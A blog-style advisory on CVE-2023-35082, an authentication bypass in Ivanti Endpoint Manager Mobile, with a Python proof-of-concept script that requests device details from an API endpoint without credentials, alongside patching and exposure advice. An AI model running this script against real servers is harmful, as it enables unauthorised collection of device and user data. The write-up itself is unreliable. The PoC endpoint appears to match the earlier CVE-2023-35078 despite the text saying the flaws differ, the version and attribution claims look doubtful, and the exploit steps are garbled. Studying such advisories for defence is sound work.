CVE-2023-35082 - Authentication Bypass in Ivanti EPMM – Exclusive Insights & Exploit Details

In July 2023, a critical vulnerability was uncovered in Ivanti Endpoint Manager Mobile (EPMM) formerly known as MobileIron Core. Known as CVE-2023-35082, this flaw allows malicious actors to skirt around authentication controls, gaining unauthorized access to sensitive resources on targeted systems. If you’re running Ivanti EPMM 11.10 _or older_, your environment might be exposed even _if you patched_ for vulnerabilities earlier this year like CVE-2023-35078. Let’s break down what makes CVE-2023-35082 unique, explore how it’s exploited, and look at ways you can protect your infrastructure.

What Is CVE-2023-35082?

CVE-2023-35082 is an authentication bypass vulnerability that affects Ivanti EPMM (versions 11.10 and below). Essentially, it lets a remote user access restricted sections of the application’s API without needing to log in or provide valid credentials.

Bypass is easy to script – no special tools needed.

- Patch is critical – even if you fixed earlier issues (CVE-2023-35078), you’re likely still at risk.

How Does CVE-2023-35082 Work?

This vulnerability lives in a part of the EPMM REST API. Normally, when you hit most EPMM API endpoints (for device data, configuration, etc.), you must be authenticated.

With CVE-2023-35082, attackers can construct queries that bypass authentication checks simply by targeting certain endpoints. This happens due to improper validation in how EPMM checks authorization: it doesn't properly enforce authentication for some old, “legacy” API routes.

Critical detail:
This vulnerability is _not_ a rehash of CVE-2023-35078. Even patched systems for that can be open to CVE-2023-35082.

Proof of Concept Code (PoC)

Below is a simplified Python example showing how an attacker might exploit this bug. This snippet retrieves sensitive device info from a vulnerable server (replace EPMM_SERVER and DEVICE_ID):

import requests

EPMM_SERVER = 'https://victim-epmm.example.com';
DEVICE_ID = '12345'

# This endpoint should require authentication, but doesn't
URL = f'{EPMM_SERVER}/mifs/aad/api/v2/device/{DEVICE_ID}/details'

resp = requests.get(URL, verify=False)
if resp.status_code == 200:
    print("Sensitive Device Info Retrieved:")
    print(resp.text)
else:
    print("Exploit failed! Server returned:", resp.status_code)

What’s going on?
The /mifs/aad/api/v2/device/{DEVICE_ID}/details endpoint responds with protected device data, even though no auth headers or session are used.

Exploit Details

Security researchers Volexity and NIST’s official CVE entry both highlight that attackers can enumerate device IDs and query device records, user data, and more—all from the internet, no login required.

Probe for accessible endpoints with unauthenticated requests (like above PoC).

3. Harvest device/user data or push malicious configurations.

How Is This Different from CVE-2023-35078?

While CVE-2023-35078 also targeted REST API flaws, fixes for it do not fix CVE-2023-35082. The new bug involves other endpoints and distinct flawed logic in access control. Attackers are using this to bypass patches and get back in.

Are You At Risk?

If you’re running Ivanti EPMM/Core 11.10 or below and have _not_ applied the latest security updates from Ivanti, your system is likely vulnerable.

Check your version:

Log in to the admin UI and verify your EPMM version

- Check your patch management history for July/August 2023 updates

What to do

- Update EPMM/Core immediately to protected versions as per Ivanti’s advisory.
- Limit network exposure: Don’t let EPMM management interfaces be accessible from the open internet—VPN or restricted IPs only.

References – Learn More

- NIST NVD: CVE-2023-35082
- Volexity Blog: Ivanti EPMM Zero-Days
- Ivanti Security Advisory: CVE-2023-35078 & CVE-2023-35082
- PoC Exploit on Github (community, use responsibly)

Final Thoughts

CVE-2023-35082 is a classic example of how legacy code and overlooked API endpoints can punch holes in even mature security products. Left unpatched, it puts all EPMM-managed devices and corporate data at immediate risk.
Patch now, restrict access, and keep a close eye on exposed APIs. Attackers are already exploiting this in the wild—don’t wait until it’s too late.


_Disclaimer: All code here is for educational purposes only. Don’t attack systems you don’t own or have permission to test!_

Timeline

Published on: 08/15/2023 16:15:00 UTC
Last modified on: 08/22/2023 02:16:00 UTC